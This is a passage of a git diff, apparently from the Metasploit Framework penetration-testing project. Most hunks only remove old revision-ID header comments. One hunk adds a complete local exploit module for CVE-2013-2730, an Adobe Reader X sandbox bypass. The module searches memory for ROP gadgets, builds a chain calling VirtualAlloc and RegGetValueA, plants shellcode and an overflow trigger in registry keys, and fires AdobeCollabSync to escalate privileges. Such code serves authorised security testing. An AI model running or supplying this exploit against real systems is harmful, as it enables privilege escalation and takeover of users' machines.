binary -*- -## -# $Id: $ -## ## # diff --git a/lib/rex/proto/rfb/constants.rb b/lib/rex/proto/rfb/constants.rb index fc5517d8a3..868b6533f1 100644 --- a/lib/rex/proto/rfb/constants.rb +++ b/lib/rex/proto/rfb/constants.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id: $ -## ## # diff --git a/lib/rex/proto/tftp.rb b/lib/rex/proto/tftp.rb index 2ed08237e4..22e93f8bf7 100644 --- a/lib/rex/proto/tftp.rb +++ b/lib/rex/proto/tftp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ # # TFTP Server implementation according to: # diff --git a/lib/rex/proto/tftp/constants.rb b/lib/rex/proto/tftp/constants.rb index d29894c8bf..476000afe4 100644 --- a/lib/rex/proto/tftp/constants.rb +++ b/lib/rex/proto/tftp/constants.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/proto/tftp' module Rex diff --git a/lib/rex/proto/tftp/server.rb b/lib/rex/proto/tftp/server.rb index c01d18f9a9..7c9e3bee3a 100644 --- a/lib/rex/proto/tftp/server.rb +++ b/lib/rex/proto/tftp/server.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/socket' require 'rex/proto/tftp' diff --git a/lib/rex/proto/tftp/server.rb.ut.rb b/lib/rex/proto/tftp/server.rb.ut.rb index b767e0c2e4..32a0647518 100755 --- a/lib/rex/proto/tftp/server.rb.ut.rb +++ b/lib/rex/proto/tftp/server.rb.ut.rb @@ -1,10 +1,5 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# -# $Revision$ -# -# $Id$ -# require 'rex/compat' require 'rex/proto/tftp' diff --git a/lib/rex/zip/archive.rb b/lib/rex/zip/archive.rb index 0c69769aee..b8b068f75f 100644 --- a/lib/rex/zip/archive.rb +++ b/lib/rex/zip/archive.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Rex module Zip diff --git a/lib/rex/zip/blocks.rb b/lib/rex/zip/blocks.rb index 6774e73869..d589b99318 100644 --- a/lib/rex/zip/blocks.rb +++ b/lib/rex/zip/blocks.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Rex module Zip diff --git a/lib/rex/zip/entry.rb b/lib/rex/zip/entry.rb index ff41196550..b063b6a72e 100644 --- a/lib/rex/zip/entry.rb +++ b/lib/rex/zip/entry.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Rex module Zip diff --git a/modules/auxiliary/server/capture/drda.rb b/modules/auxiliary/server/capture/drda.rb index 2072b8545b..f77fe8c5af 100644 --- a/modules/auxiliary/server/capture/drda.rb +++ b/modules/auxiliary/server/capture/drda.rb @@ -1,6 +1,4 @@ -## -# $Id: drda.rb 14774 2012-02-21 01:42:17Z rapid7 $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb index b3c33e892f..f98eed8595 100644 --- a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb @@ -1,6 +1,4 @@ -## -# $Id: $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb index 11b5d57c76..6900ed129a 100644 --- a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb @@ -1,6 +1,4 @@ -## -# $Id: $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb index 422b8f8392..ae8b61a428 100644 --- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb +++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb @@ -1,6 +1,4 @@ -## -# $Id: jboss_deploymentfilerepository.rb 15620 2012-07-12 07:33:06Z rapid7 $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb index bec17f874b..ea8fcce859 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb +++ b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb @@ -1,6 +1,4 @@ -## -# $Id: novelliprint_getdriversettings.rb$ -## +# -*- coding: binary -*- ### # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb new file mode 100644 index 0000000000..50a7c3ad46 --- /dev/null +++ b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb @@ -0,0 +1,359 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/windows/registry' +require 'msf/core/post/common' +require 'msf/core/post/file' + +class Metasploit3 < Msf::Exploit::Local + Rank = GreatRanking + + include Msf::Exploit::EXE + include Msf::Post::Common + include Msf::Post::File + include Msf::Post::Windows::Registry + + def initialize(info={}) + super(update_info(info, { + 'Name' => 'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass', + 'Description' => %q{ + This module exploits a vulnerability on Adobe Reader X Sandbox. The + vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe + process to write register values which can be used to trigger a buffer overflow on + the AdobeCollabSync component, allowing to achieve Medium Integrity Level + privileges from a Low Integrity AcroRd32.exe process. This module has been tested + successfully on Adobe Reader X 10.1.4 over Windows 7 SP1. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Felipe Andres Manzano', # Vulnerability discovery and PoC + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-2730' ], + [ 'OSVDB', '93355' ], + [ 'URL', 'http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html' ] + ], + 'Arch' => ARCH_X86, + 'Platform' => 'win', + 'SessionTypes' => 'meterpreter', + 'Payload' => + { + 'Space' => 12288, + 'DisableNops' => true + }, + 'Targets' => + [ + [ 'Adobe Reader X 10.1.4 / Windows 7 SP1', + { + 'AdobeCollabSyncTrigger' => 0x18fa0, + 'AdobeCollabSyncTriggerSignature' => "\x56\x68\xBC\x00\x00\x00\xE8\xF5\xFD\xFF\xFF" + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate'=> 'May 14 2013' + })) + + end + + def on_new_session + print_status("Deleting Malicious Registry Keys...") + if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode") + print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode by yourself") + end + if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB") + print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB by yourself") + end + print_status("Cleanup finished") + end + + # Test the process integrity level by trying to create a directory on the TEMP folder + # Access should be granted with Medium Integrity Level + # Access should be denied with Low Integrity Level + # Usint this solution atm because I'm experiencing problems with railgun when trying + # use GetTokenInformation + def low_integrity_level? + tmp_dir = expand_path("%TEMP%") + cd(tmp_dir) + new_dir = "#{rand_text_alpha(5)}" + begin + session.shell_command_token("mkdir #{new_dir}") + rescue + return true + end + + if directory?(new_dir) + session.shell_command_token("rmdir #{new_dir}") + return false + else + return true + end + end + + def check_trigger + signature = session.railgun.memread(@addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'], target['AdobeCollabSyncTriggerSignature'].length) + if signature == target['AdobeCollabSyncTriggerSignature'] + return true + end + return false + end + + def collect_addresses + # find the trigger to launch AdobeCollabSyncTrigger.exe from AcroRd32.exe + @addresses['trigger'] = @addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'] + vprint_good("AdobeCollabSyncTrigger trigger address found at 0x#{@addresses['trigger'].to_s(16)}") + + # find kernel32.dll + kernel32 = session.railgun.kernel32.GetModuleHandleA("kernel32.dll") + @addresses['kernel32.dll'] = kernel32["return"] + if @addresses['kernel32.dll'] == 0 + fail_with(Exploit::Failure::Unknown, "Unable to find kernel32.dll") + end + vprint_good("kernel32.dll address found at 0x#{@addresses['kernel32.dll'].to_s(16)}") + + # find kernel32.dll methods + virtual_alloc = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "VirtualAlloc") + @addresses['VirtualAlloc'] = virtual_alloc["return"] + if @addresses['VirtualAlloc'] == 0 + fail_with(Exploit::Failure::Unknown, "Unable to find VirtualAlloc") + end + vprint_good("VirtualAlloc address found at 0x#{@addresses['VirtualAlloc'].to_s(16)}") + + reg_get_value = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "RegGetValueA") + @addresses['RegGetValueA'] = reg_get_value["return"] + if @addresses['RegGetValueA'] == 0 + fail_with(Exploit::Failure::Unknown, "Unable to find RegGetValueA") + end + vprint_good("RegGetValueA address found at 0x#{@addresses['RegGetValueA'].to_s(16)}") + + # find ntdll.dll + ntdll = session.railgun.kernel32.GetModuleHandleA("ntdll.dll") + @addresses['ntdll.dll'] = ntdll["return"] + if @addresses['ntdll.dll'] == 0 + fail_with(Exploit::Failure::Unknown, "Unable to find ntdll.dll") + end + vprint_good("ntdll.dll address found at 0x#{@addresses['ntdll.dll'].to_s(16)}") + end + + # Search a gadget identified by pattern on the process memory + def search_gadget(base, offset_start, offset_end, pattern) + mem = base + offset_start + length = offset_end - offset_start + mem_contents = session.railgun.memread(mem, length) + return mem_contents.index(pattern) + end + + # Search for gadgets on ntdll.dll + def search_gadgets + ntdll_text_base = 0x10000 + search_length = 0xd6000 + + @gadgets['mov [edi], ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x89\x0f\xc3") + if @gadgets['mov [edi], ecx # ret'].nil? + fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'mov [edi], ecx # ret'") + end + @gadgets['mov [edi], ecx # ret'] += @addresses['ntdll.dll'] + @gadgets['mov [edi], ecx # ret'] += ntdll_text_base + vprint_good("Gadget 'mov [edi], ecx # ret' found at 0x#{@gadgets['mov [edi], ecx # ret'].to_s(16)}") + + @gadgets['ret'] = @gadgets['mov [edi], ecx # ret'] + 2 + vprint_good("Gadget 'ret' found at 0x#{@gadgets['ret'].to_s(16)}") + + @gadgets['pop edi # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x5f\xc3") + if @gadgets['pop edi # ret'].nil? + fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop edi # ret'") + end + @gadgets['pop edi # ret'] += @addresses['ntdll.dll'] + @gadgets['pop edi # ret'] += ntdll_text_base + vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop edi # ret'].to_s(16)}") + + @gadgets['pop ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x59\xc3") + if @gadgets['pop ecx # ret'].nil? + fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop ecx # ret'") + end + @gadgets['pop ecx # ret'] += @addresses['ntdll.dll'] + @gadgets['pop ecx # ret'] += ntdll_text_base + vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}") + end + + def store(buf, data, address) + i = 0 + while (i < data.length) + buf << [@gadgets['pop edi # ret']].pack("V") + buf << [address + i].pack("V") # edi + buf << [@gadgets['pop ecx # ret']].pack("V") + buf << data[i, 4].ljust(4,"\x00") # ecx + buf << [@gadgets['mov [edi], ecx # ret']].pack("V") + i = i + 4 + end + return i + end + + def create_rop_chain + mem = 0x0c0c0c0c + + buf = [0x58000000 + 1].pack("V") + buf << [0x58000000 + 2].pack("V") + buf << [0].pack("V") + buf << [0x58000000 + 4].pack("V") + + buf << [0x58000000 + 5].pack("V") + buf << [0x58000000 + 6].pack("V") + buf << [0x58000000 + 7].pack("V") + buf << [@gadgets['ret']].pack("V") + buf << rand_text(8) + + # Allocate Memory To store the shellcode and the necessary data to read the + # shellcode stored in the registry + buf << [@addresses['VirtualAlloc']].pack("V") + buf << [@gadgets['ret']].pack("V") + buf << [mem].pack("V") # lpAddress + buf << [0x00010000].pack("V") # SIZE_T dwSize + buf << [0x00003000].pack("V") # DWORD flAllocationType + buf << [0x00000040].pack("V") # flProtect + + # Put in the allocated memory the necessary data in order to read the + # shellcode stored in the registry + # 1) The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions + reg_key = "Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\x00" + reg_key_length = store(buf, reg_key, mem) + # 2) The reg entry: shellcode + value_key = "shellcode\x00" + store(buf, value_key, mem + reg_key_length) + # 3) The output buffer size: 0x3000 + size_buffer = 0x3000 + buf << [@gadgets['pop edi # ret']].pack("V") + buf << [mem + 0x50].pack("V") # edi + buf << [@gadgets['pop ecx # ret']].pack("V") + buf << [size_buffer].pack("V") # ecx + buf << [@gadgets['mov [edi], ecx # ret']].pack("V") + + # Copy the shellcode from the the registry to the + # memory allocated with executable permissions and + # ret into there + buf << [@addresses['RegGetValueA']].pack("V") + buf << [mem + 0x1000].pack("V") # ret to shellcode + buf << [0x80000001].pack("V") # hkey => HKEY_CURRENT_USER + buf << [mem].pack("V") # lpSubKey + buf << [mem + 0x3c].pack("V") # lpValue + buf << [0x0000FFFF].pack("V") # dwFlags => RRF_RT_ANY + buf << [0].pack("V") # pdwType + buf << [mem + 0x1000].pack("V") # pvData + buf << [mem + 0x50].pack("V") # pcbData + end + + # Store shellcode and AdobeCollabSync.exe Overflow trigger in the Registry + def store_data_registry(buf) + vprint_status("Creating the Registry Key to store the shellcode...") + + if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode") + vprint_good("Registry Key created") + else + fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Key to store the shellcode") + end + + vprint_status("Storing the shellcode in the Registry...") + + if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "shellcode", payload.encoded, "REG_BINARY") + vprint_good("Shellcode stored") + else + fail_with(Exploit::Failure::Unknown, "Failed to store shellcode in the Registry") + end + + # Create the Malicious registry entry in order to exploit.... + vprint_status("Creating the Registry Key to trigger the Overflow...") + if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB") + vprint_good("Registry Key created") + else + fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Entry to trigger the Overflow") + end + + vprint_status("Storing the trigger in the Registry...") + if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "bDeleteDB", buf, "REG_BINARY") + vprint_good("Trigger stored") + else + fail_with(Exploit::Failure::Unknown, "Failed to store the trigger in the Registry") + end + end + + def trigger_overflow + vprint_status("Creating the thread to trigger the Overflow on AdobeCollabSync.exe...") + # Create a thread in order to execute the necessary code to launch AdobeCollabSync + ret = session.railgun.kernel32.CreateThread(nil, 0, @addresses['trigger'], nil, "CREATE_SUSPENDED", nil) + if ret['return'] < 1 + print_error("Unable to CreateThread") + return + end + hthread = ret['return'] + + vprint_status("Resuming the Thread...") + # Resume the thread to actually Launch AdobeCollabSync and trigger the vulnerability! + ret = client.railgun.kernel32.ResumeThread(hthread) + if ret['return'] < 1 + fail_with(Exploit::Failure::Unknown, "Unable to ResumeThread") + end + end + + def check + @addresses = {} + acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe") + @addresses['AcroRd32.exe'] = acrord32["return"] + if @addresses['AcroRd32.exe'] == 0 + return Msf::Exploit::CheckCode::Unknown + elsif check_trigger + return Msf::Exploit::CheckCode::Vulnerable + else + return Msf::Exploit::CheckCode::Detected + end + end + + def exploit + @addresses = {} + @gadgets = {} + + print_status("Verifying we're in the correct target process...") + acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe") + @addresses['AcroRd32.exe'] = acrord32["return"] + if @addresses['AcroRd32.exe'] == 0 + fail_with(Exploit::Failure::NoTarget, "AcroRd32.exe process not found") + end + vprint_good("AcroRd32.exe found at 0x#{@addresses['AcroRd32.exe'].to_s(16)}") + + print_status("Checking the AcroRd32.exe image...") + if not check_trigger + fail_with(Exploit::Failure::NoTarget, "Please check the target, the AcroRd32.exe process doesn't match with the target") + end + + print_status("Checking the Process Integrity Level...") + if not low_integrity_level? + fail_with(Exploit::Failure::NoTarget, "Looks like you don't need this Exploit since you're already enjoying Medium Level") + end + + print_status("Collecting necessary addresses for exploit...") + collect_addresses + + print_status("Searching the gadgets needed to build the ROP chain...") + search_gadgets + print_good("Gadgets collected...") + + print_status("Building the ROP chain...") + buf = create_rop_chain + print_good("ROP chain ready...") + + print_status("Storing the shellcode and the trigger in the Registry...") + store_data_registry(buf) + + print_status("Executing AdobeCollabSync.exe...") + trigger_overflow + end +end + diff --git a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb index e0715c8038..f91f26f1e1 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb @@ -1,6 +1,4 @@ -## -# $Id: $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/post/windows/gather/credentials/imvu.rb b/modules/post/windows/gather/credentials/imvu.rb index 745e30410b..2129a721a6 100644 --- a/modules/post/windows/gather/credentials/imvu.rb +++ b/modules/post/windows/gather/credentials/imvu.rb @@ -1,6 +1,4 @@ -## -# $Id: enum_imvu.rb 14100 2011-10-28 18:00:10Z theLightCosine $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb index f9bf10b3e3..38c25e3895 100644 --- a/modules/post/windows/gather/credentials/outlook.rb +++ b/modules/post/windows/gather/credentials/outlook.rb @@ -1,4 +1,4 @@ -# $Id: outlook.rb 14835 2012-03-01 22:15:05Z rapid7 $ +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/post/windows/recon/resolve_ip.rb b/modules/post/windows/recon/resolve_ip.rb index f4e761de39..36722018f0 100644 --- a/modules/post/windows/recon/resolve_ip.rb +++ b/modules/post/windows/recon/resolve_ip.rb @@ -1,6 +1,4 @@ -## -# $Id $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to